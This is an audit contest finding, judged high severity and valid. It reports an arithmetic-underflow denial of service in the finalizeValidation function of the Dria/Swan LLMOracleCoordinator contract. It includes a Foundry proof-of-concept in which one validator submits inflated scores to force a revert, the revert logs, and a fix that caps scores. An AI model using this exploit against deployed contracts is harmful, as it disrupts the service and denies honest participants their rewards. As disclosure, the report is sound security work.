Dria

Swan
NFTHardhat
21,000 USDC
View results
Submission Details
Severity: high
Valid

Inflated Score Exploit: Risk of Underflow and Service Disruption

Summary

The finalizeValidation function of the LLMOracleCoordinator contract, which is susceptible to a Denial of Service (DoS) attack through inflated validator scores. The vulnerability arises when a malicious actor submits exaggerated scores, resulting in the calculated standard deviation (_stddev) exceeding the mean (_mean). This anomalous situation can lead to arithmetic computation errors, potentially causing the transaction to revert and denying service.

Vulnerability Details

The vulnerability is positioned within the finalizeValidation function where the mean and standard deviation are computed for scores submitted by validators.

https://github.com/Cyfrin/2024-10-swan-dria/blob/c8686b199daadcef3161980022e12b66a5304f8e/contracts/llm/LLMOracleCoordinator.sol#L323C1-L372C6

function finalizeValidation(uint256 taskId) private {
TaskRequest storage task = requests[taskId];
// compute score for each generation
for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
// get the scores for this generation, i.e. the g_i-th element of each validation
uint256[] memory scores = new uint256[]();
for (uint256 v_i = 0; v_i < task.parameters.numValidations; v_i++) {
scores[v_i] = validations[taskId][v_i].scores[g_i];
}
// compute the mean and standard deviation
(uint256 _stddev, uint256 _mean) = Statistics.stddev(scores);
// compute the score for this generation as the "inner-mean"
// and send rewards to validators that are within the range
uint256 innerSum = 0;
uint256 innerCount = 0;
for (uint256 v_i = 0; v_i < task.parameters.numValidations; ++v_i) {
uint256 score = scores[v_i];
@>> if ((score >= _mean - _stddev) && (score <= _mean + _stddev)) {
innerSum += score;
innerCount++;
// send validation fee to the validator
_increaseAllowance(validations[taskId][v_i].validator, task.validatorFee);
}
}
// set score for this generation as the average of inner scores
uint256 inner_score = innerCount == 0 ? 0 : innerSum / innerCount;
responses[taskId][g_i].score = inner_score;
}
// now, we have the scores for each generation
// compute stddev for these and pick the ones above a threshold
uint256[] memory generationScores = new uint256[]();
for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
generationScores[g_i] = responses[taskId][g_i].score;
}
// compute the mean and standard deviation
(uint256 stddev, uint256 mean) = Statistics.stddev(generationScores);
for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
// ignore lower outliers
if (generationScores[g_i] >= mean - generationDeviationFactor * stddev) {
_increaseAllowance(responses[taskId][g_i].responder, task.generatorFee);
}
}
}
  • The computation of standard deviation and mean is sensitive to extreme deviations in score inputs. Inflated scores can result in the _stddev value surpassing the _mean, which breaks the logic using these calculations for determining validators' reward eligibility.

  • When _stddev becomes greater than _mean, range checks of scores for reward distribution (_mean ± _stddev) lead to a logical incongruity, invoking arithmetic underflow, thus causing the entire transaction to fail.

Impact

The most immediate impact is a DoS condition.

POC

The POC demonstrates the vulnerability in the LLMOracleCoordinator contract where a malicious validator inflates scores, leading to an arithmetic underflow and transaction revert.

Setup Steps

  1. Initialize Validators:

    • Four validators are set up with addresses and registered with the required fee tokens, preparing them for the validation process.

  2. Score Configuration:

    • Validators are configured with two sets of scores:

      • Regular scores (55, 86, 99, 71) within an expected range of 1 to 100.

      • Inflated scores (100,000; 80,000; 90,000; 70,000) used by the malicious validator to attack.

  3. Attack Execution:

    • The first validator submits inflated scores (scores2) aiming to skew standard deviation calculations and induce an underflow.

  4. Validation & Execution:

    • Validators mine nonces and submit validations. The malicious scores lead to abnormal variability, resulting in an underflow when calculating variance or standard deviation.

function testMultipleRepliesToTaskRequest() public {
vm.startPrank(user);
// Register the user as a generator in the registry
deal(address(feeToken), user, 1000 ether);
feeToken.approve(address(registry), 1000 ether);
registry.register(LLMOracleKind.Generator);
bytes32 protocol = "test/1.0.0";
bytes memory input = "Generate text";
bytes memory models = "";
LLMOracleTaskParameters memory params = LLMOracleTaskParameters(5, 4, 4); // Set numGenerations to 4 for this test
// Simulate user having enough tokens and approving
deal(address(feeToken), user, 100 ether);
feeToken.approve(address(coordinator), 100 ether);
uint256 taskId = coordinator.request(protocol, input, models, params);
vm.stopPrank();
// Define other users for responding
address[] memory responders = new address[]();
responders[0] = address(0x456);
responders[1] = address(0x789);
responders[2] = address(0xABC);
responders[3] = address(0xDEF);
// Register all responders as generators
for (uint256 i = 0; i < responders.length; i++) {
deal(address(feeToken), responders[i], 1100 ether);
vm.startPrank(responders[i]);
feeToken.approve(address(registry), 1000 ether);
registry.register(LLMOracleKind.Generator);
vm.stopPrank();
}
// Each responder responds with a valid response
bytes memory responseOutput = "Response output text";
bytes memory metadata = "Oracle metadata";
for (uint256 i = 0; i < responders.length; i++) {
respondToTask(taskId, responders[i], responseOutput, metadata);
}
// Verify multiple responses are recorded
LLMOracleTask.TaskResponse[] memory responses = coordinator.getResponses(taskId);
assertEq(responses.length, 4);
for (uint256 i = 0; i < responders.length; i++) {
assertEq(responses[i].responder, responders[i]);
// Additional checks as necessary for nonce, output, and metadata if desired
}
logTaskRequestDetails(taskId);
logTaskResponseDetails(taskId);
}
function testValidateMultipleResponses() public {
// Setup multiple responses using the existing test function
testMultipleRepliesToTaskRequest();
// Define validators and register them
address[] memory validators = new address[]();
validators[0] = address(0x5678);
validators[1] = address(0x6789);
validators[2] = address(0x7890);
validators[3] = address(0x8901);
uint256[] memory scores = new uint256[]();
scores[0] = 55;
scores[1] = 86;
scores[2] = 99;
scores[3] = 71;
uint256[] memory scores2 = new uint256[]();
scores2[0] = 100000;
scores2[1] = 80000;
scores2[2] = 90000;
scores2[3] = 70000;
// Register all validators
for (uint256 i = 0; i < validators.length; i++) {
deal(address(feeToken), validators[i], 1100 ether);
vm.startPrank(validators[i]);
feeToken.approve(address(registry), 1000 ether);
registry.register(LLMOracleKind.Validator);
vm.stopPrank();
}
uint256 taskId = 1; // Assuming taskId from setup function is 1
(address requester, , LLMOracleTaskParameters memory parameters, , , , , bytes memory input, ) = coordinator.requests(taskId);
// Call validation from each validator
bytes memory metadata = "Validator metadata";
//Attack
vm.startPrank(validators[0]);
uint256 nonce = mineValidNonce(taskId, input, requester, validators[0], parameters.difficulty); // Example difficulty
coordinator.validate(taskId, nonce, scores2, metadata); // Assuming validate accepts score array
vm.stopPrank();
for (uint256 i = 1; i < 4; i++) {
vm.startPrank(validators[i]);
uint256 nonce = mineValidNonce(taskId, input, requester, validators[i], parameters.difficulty); // Example difficulty
coordinator.validate(taskId, nonce, scores, metadata); // Assuming validate accepts score array
vm.stopPrank();
}
// Verify validations are recorded correctly
LLMOracleTask.TaskValidation[] memory validations = coordinator.getValidations(taskId);
assertEq(validations.length, 4);
for (uint256 i = 0; i < validators.length; i++) {
assertEq(validations[i].validator, validators[i]);
}
logTaskRequestDetails(taskId);
logTaskResponseDetails(taskId);
}
  • The test concludes with a revert due to arithmetic underflow, effectively demonstrating the potential for a Denial of Service (DoS) via manipulated score inputs.

Logs

│ │ ├─ [0] console::log("finalizeValidation entered") [staticcall]
│ │ │ └─ ← [Stop]
│ │ ├─ [0] console::log("_stddev : ", 43277 [4.327e4]) [staticcall]
│ │ │ └─ ← [Stop]
│ │ ├─ [0] console::log("_mean : ", 25041 [2.504e4]) [staticcall]
│ │ │ └─ ← [Stop]
│ │ └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)

Tools Used

Foundry

Recommendations

Implement strict input validation checks to ensure submitted scores fall within a realistic and acceptable range. This can prevent overly large or malicious scores from being processed.

function validate(
uint256 taskId,
uint256 nonce,
uint256[] calldata scores,
bytes calldata metadata
)
public
onlyRegistered(LLMOracleKind.Validator)
onlyAtStatus(taskId, TaskStatus.PendingValidation)
{
TaskRequest storage task = requests[taskId];
uint256 maxScore = 100; // Define a maximum allowable score limit
// Ensure there is a score for each generation
if (scores.length != task.parameters.numGenerations) {
revert InvalidValidation(taskId, msg.sender);
}
// Validate that no score exceeds the maximum limit
++ for (uint256 i = 0; i < scores.length; i++) {
++ if (scores[i] > maxScore) {
++ revert("Score exceeds maximum allowable limit"); // Revert if any score is too high
++ }
Updates

Lead Judging Commences

inallhonesty Lead Judge 7 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Underflow in `LLMOracleCoordinator::validate`

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.